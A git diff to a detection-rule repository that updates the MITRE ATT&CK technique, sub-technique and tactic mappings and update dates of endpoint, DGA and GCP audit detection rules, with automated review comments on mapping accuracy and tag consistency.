@@ -89,14 +89,18 @@ The detection rule leverages machine learning to identify anomalies in data tran - Consider deploying endpoint detection and response (EDR) solutions to enhance visibility and control over data movements to external devices.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1052" name = "Exfiltration Over Physical Medium" reference = "https://attack.mitre.org/techniques/T1052/" +[[rule.threat.technique.subtechnique]] +id = "T1052.001" +name = "Exfiltration over USB" +reference = "https://attack.mitre.org/techniques/T1052/001/" [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - diff --git a/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device_airdrop.toml b/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device_airdrop.toml index a69cb0486c3..efabd632315 100644 --- a/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device_airdrop.toml +++ b/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device_airdrop.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["ded", "endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 
@@ -90,14 +90,18 @@ Airdrop facilitates seamless file sharing between Apple devices, leveraging Blue - Update security policies and controls to restrict Airdrop usage to only trusted devices and networks, reducing the risk of future unauthorized data transfers.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1011" name = "Exfiltration Over Other Network Medium" reference = "https://attack.mitre.org/techniques/T1011/" +[[rule.threat.technique.subtechnique]] +id = "T1011.001" +name = "Exfiltration Over Bluetooth" +reference = "https://attack.mitre.org/techniques/T1011/001/" [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - diff --git a/rules/integrations/ded/exfiltration_ml_rare_process_writing_to_external_device.toml b/rules/integrations/ded/exfiltration_ml_rare_process_writing_to_external_device.toml index d0c800d51aa..f4de893c2c1 100644 --- a/rules/integrations/ded/exfiltration_ml_rare_process_writing_to_external_device.toml +++ b/rules/integrations/ded/exfiltration_ml_rare_process_writing_to_external_device.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["ded", "endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 
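Review bot: T1011.001 (Exfiltration Over Bluetooth) is an imprecise sub-technique for AirDrop: Bluetooth LE is used only for peer discovery, and the file itself is transferred over a peer-to-peer Wi-Fi link, so the data does not leave the host over Bluetooth. The parent T1011 (Exfiltration Over Other Network Medium), already present, is the accurate mapping; drop the sub-technique block unless the team deliberately wants the coarser Bluetooth tag and says so in the rule. Separately, the added `+[[rule.threat.technique.subtechnique]]` table follows the `reference` line with no blank line, unlike every other table header in these files; insert a `+` blank line before it for consistency.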
@@ -89,14 +89,18 @@ In modern environments, processes may write data to external devices for legitim - Update security policies and controls to prevent similar exfiltration attempts, such as restricting process permissions to write to external devices and enhancing endpoint protection measures.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1052" name = "Exfiltration Over Physical Medium" reference = "https://attack.mitre.org/techniques/T1052/" +[[rule.threat.technique.subtechnique]] +id = "T1052.001" +name = "Exfiltration over USB" +reference = "https://attack.mitre.org/techniques/T1052/001/" [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - diff --git a/rules/integrations/dga/command_and_control_ml_dga_activity_using_sunburst_domain.toml b/rules/integrations/dga/command_and_control_ml_dga_activity_using_sunburst_domain.toml index 4754264f30d..c73adc011f1 100644 --- a/rules/integrations/dga/command_and_control_ml_dga_activity_using_sunburst_domain.toml +++ b/rules/integrations/dga/command_and_control_ml_dga_activity_using_sunburst_domain.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/14" integration = ["dga", "endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/04/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -99,19 +99,28 @@ Domain Generation Algorithms (DGAs) are used by adversaries to dynamically gener [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.004" +name = "DNS" +reference = "https://attack.mitre.org/techniques/T1071/004/" + [[rule.threat.technique]] id = "T1568" name = "Dynamic Resolution" reference = "https://attack.mitre.org/techniques/T1568/" + [[rule.threat.technique.subtechnique]] id = "T1568.002" name = "Domain Generation Algorithms" reference = "https://attack.mitre.org/techniques/T1568/002/" - - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/integrations/dga/command_and_control_ml_dga_high_sum_probability.toml b/rules/integrations/dga/command_and_control_ml_dga_high_sum_probability.toml index afcf159faef..e02a63c654f 100644 --- a/rules/integrations/dga/command_and_control_ml_dga_high_sum_probability.toml +++ b/rules/integrations/dga/command_and_control_ml_dga_high_sum_probability.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/14" integration = ["dga", "endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] anomaly_threshold = 70 
@@ -96,14 +96,28 @@ Domain Generation Algorithms (DGAs) are used by malware to dynamically generate - Escalate to incident response team: If the threat is confirmed and widespread, escalate the incident to the organization's incident response team for further investigation and coordinated response efforts.""" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.004" +name = "DNS" +reference = "https://attack.mitre.org/techniques/T1071/004/" + [[rule.threat.technique]] id = "T1568" name = "Dynamic Resolution" reference = "https://attack.mitre.org/techniques/T1568/" +[[rule.threat.technique.subtechnique]] +id = "T1568.002" +name = "Domain Generation Algorithms" +reference = "https://attack.mitre.org/techniques/T1568/002/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/integrations/dga/command_and_control_ml_dns_request_high_dga_probability.toml b/rules/integrations/dga/command_and_control_ml_dns_request_high_dga_probability.toml index 1e9fe0424c3..1779d62bc79 100644 --- a/rules/integrations/dga/command_and_control_ml_dns_request_high_dga_probability.toml +++ b/rules/integrations/dga/command_and_control_ml_dns_request_high_dga_probability.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/14" integration = ["dga", "endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -98,19 +98,28 @@ Machine learning models analyze DNS requests to identify patterns indicative of [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.004" +name = "DNS" +reference = "https://attack.mitre.org/techniques/T1071/004/" + [[rule.threat.technique]] id = "T1568" name = "Dynamic Resolution" reference = "https://attack.mitre.org/techniques/T1568/" + [[rule.threat.technique.subtechnique]] id = "T1568.002" name = "Domain Generation Algorithms" reference = "https://attack.mitre.org/techniques/T1568/002/" - - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/integrations/dga/command_and_control_ml_dns_request_predicted_to_be_a_dga_domain.toml b/rules/integrations/dga/command_and_control_ml_dns_request_predicted_to_be_a_dga_domain.toml index 4f2e1f35a0a..8db1349b652 100644 --- a/rules/integrations/dga/command_and_control_ml_dns_request_predicted_to_be_a_dga_domain.toml +++ b/rules/integrations/dga/command_and_control_ml_dns_request_predicted_to_be_a_dga_domain.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/14" integration = ["dga", "endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -99,19 +99,28 @@ Machine learning models can identify patterns in DNS requests that suggest the u [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.004" +name = "DNS" +reference = "https://attack.mitre.org/techniques/T1071/004/" + [[rule.threat.technique]] id = "T1568" name = "Dynamic Resolution" reference = "https://attack.mitre.org/techniques/T1568/" + [[rule.threat.technique.subtechnique]] id = "T1568.002" name = "Domain Generation Algorithms" reference = "https://attack.mitre.org/techniques/T1568/002/" - - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/integrations/fim/persistence_suspicious_file_modifications.toml b/rules/integrations/fim/persistence_suspicious_file_modifications.toml index 4ef9a45946f..c1132aad536 100644 --- a/rules/integrations/fim/persistence_suspicious_file_modifications.toml +++ b/rules/integrations/fim/persistence_suspicious_file_modifications.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/03" integration = ["fim"] maturity = "production" -updated_date = "2025/12/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -220,14 +220,24 @@ name = "RC Scripts" reference = "https://attack.mitre.org/techniques/T1037/004/" [[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" [[rule.threat.technique.subtechnique]] -id = "T1547.006" -name = "Kernel Modules and Extensions" -reference = "https://attack.mitre.org/techniques/T1547/006/" +id = "T1053.002" +name = "At" +reference = "https://attack.mitre.org/techniques/T1053/002/" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.004" +name = "SSH Authorized Keys" +reference = "https://attack.mitre.org/techniques/T1098/004/" [[rule.threat.technique]] id = "T1136" 
@@ -249,6 +259,36 @@ id = "T1543.002" name = "Systemd Service" reference = "https://attack.mitre.org/techniques/T1543/002/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.004" +name = "Unix Shell Configuration Modification" +reference = "https://attack.mitre.org/techniques/T1546/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.017" +name = "Udev Rules" +reference = "https://attack.mitre.org/techniques/T1546/017/" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.013" +name = "XDG Autostart Entries" +reference = "https://attack.mitre.org/techniques/T1547/013/" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" diff --git a/rules/integrations/gcp/collection_gcp_pub_sub_subscription_creation.toml b/rules/integrations/gcp/collection_gcp_pub_sub_subscription_creation.toml index 2ade101b010..33faa556722 100644 --- a/rules/integrations/gcp/collection_gcp_pub_sub_subscription_creation.toml +++ b/rules/integrations/gcp/collection_gcp_pub_sub_subscription_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/23" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -81,14 +81,18 @@ event.dataset:gcp.audit and event.action:google.pubsub.v*.Subscriber.CreateSubsc [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1119" +name = "Automated Collection" +reference = "https://attack.mitre.org/techniques/T1119/" + [[rule.threat.technique]] id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - diff --git a/rules/integrations/gcp/collection_gcp_pub_sub_topic_creation.toml b/rules/integrations/gcp/collection_gcp_pub_sub_topic_creation.toml index 2f2e473a30c..0473d5f4fa8 100644 --- a/rules/integrations/gcp/collection_gcp_pub_sub_topic_creation.toml +++ b/rules/integrations/gcp/collection_gcp_pub_sub_topic_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/23" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,14 +84,26 @@ event.dataset:gcp.audit and event.action:google.pubsub.v*.Publisher.CreateTopic [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1651" +name = "Cloud Administration Command" +reference = "https://attack.mitre.org/techniques/T1651/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_created.toml b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_created.toml index 6999cef9783..9d21843dd4f 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_created.toml 
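Review bot: The new `[[rule.threat]]` block mapping T1651 to the Execution tactic in collection_gcp_pub_sub_topic_creation.toml comes with no change to the rule's `tags` list, which sits outside the hunk; if `tags` does not already contain `Tactic: Execution`, the repo's tactic/tag consistency test will presumably report the mismatch. The same check applies to every other entry in this chunk that introduces a tactic the rule did not have before: Impact in the pub/sub subscription and topic deletion, VPC network deletion and service-account-key deletion rules, Persistence and Privilege Escalation in the storage-bucket-permissions and custom-role-creation rules, Defense Evasion in the logging-sink modification and the three rare-method ML rules, and Persistence in rare-method-by-country. A quick look at `tags = [` in each touched file before merging would settle it.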
+++ b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -87,14 +87,18 @@ event.dataset:gcp.audit and event.action:(*.compute.firewalls.insert or google.a [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_deleted.toml b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_deleted.toml index 6ac6b9d0085..d6c9d4f6b8f 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_deleted.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,14 +84,18 @@ event.dataset:gcp.audit and event.action:(*.compute.firewalls.delete or google.a [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - 
diff --git a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_modified.toml b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_modified.toml index 3afdc0d904e..3e4fed7407c 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_modified.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -87,14 +87,18 @@ event.dataset:gcp.audit and event.action:(*.compute.firewalls.patch or google.ap [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/gcp/defense_evasion_gcp_logging_bucket_deletion.toml b/rules/integrations/gcp/defense_evasion_gcp_logging_bucket_deletion.toml index 0959ed9e33e..8f5b62bc283 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_logging_bucket_deletion.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_logging_bucket_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -84,14 +84,18 @@ event.dataset:gcp.audit and event.action:google.logging.v*.ConfigServiceV*.Delet [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/gcp/defense_evasion_gcp_logging_sink_deletion.toml b/rules/integrations/gcp/defense_evasion_gcp_logging_sink_deletion.toml index 36bd43f1c07..e31c93cdc88 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_logging_sink_deletion.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_logging_sink_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/18" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -81,14 +81,18 @@ event.dataset:gcp.audit and event.action:google.logging.v*.ConfigServiceV*.Delet [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml b/rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml index b232902cc6d..e3ee14773ab 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/09/23" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -82,14 +82,26 @@ event.dataset:gcp.audit and event.action:google.pubsub.v*.Subscriber.DeleteSubsc [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1489" +name = "Service Stop" +reference = "https://attack.mitre.org/techniques/T1489/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml b/rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml index 01e2afac043..3a37cf5ddb8 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/18" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -83,14 +83,26 @@ event.dataset:gcp.audit and event.action:google.pubsub.v*.Publisher.DeleteTopic [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1489" +name = "Service Stop" +reference = "https://attack.mitre.org/techniques/T1489/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_configuration_modified.toml b/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_configuration_modified.toml index d518d9a46db..57cc51606af 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_configuration_modified.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_configuration_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/22" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -82,14 +82,18 @@ event.dataset:gcp.audit and event.action:"storage.buckets.update" and event.outc [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1578" name = "Modify Cloud Compute Infrastructure" reference = "https://attack.mitre.org/techniques/T1578/" +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - 
diff --git a/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml b/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml index 66e67424205..b73908983d6 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -82,14 +82,49 @@ event.dataset:gcp.audit and event.action:"storage.setIamPermissions" and event.o [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1222" name = "File and Directory Permissions Modification" reference = "https://attack.mitre.org/techniques/T1222/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" 
diff --git a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml index 49efa174d6f..53b59b684e5 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/22" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -82,19 +82,31 @@ event.dataset:gcp.audit and event.action:v*.compute.networks.delete and event.ou [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.007" name = "Disable or Modify Cloud Firewall" reference = "https://attack.mitre.org/techniques/T1562/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_created.toml b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_created.toml index 8ae59e5172f..2c3215cd61f 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_created.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/22" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -83,19 +83,28 @@ event.dataset:gcp.audit and event.action:(v*.compute.routes.insert or "beta.comp [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.007" name = "Disable or Modify Cloud Firewall" reference = "https://attack.mitre.org/techniques/T1562/007/" +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_deleted.toml b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_deleted.toml index 2dbfe20dffd..535b01be892 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_deleted.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/22" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -83,19 +83,28 @@ event.dataset:gcp.audit and event.action:v*.compute.routes.delete and event.outc [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.007" name = "Disable or Modify Cloud Firewall" reference = "https://attack.mitre.org/techniques/T1562/007/" +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml b/rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml index cff4a666a38..54b9bf8b324 100644 --- a/rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml +++ b/rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/22" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
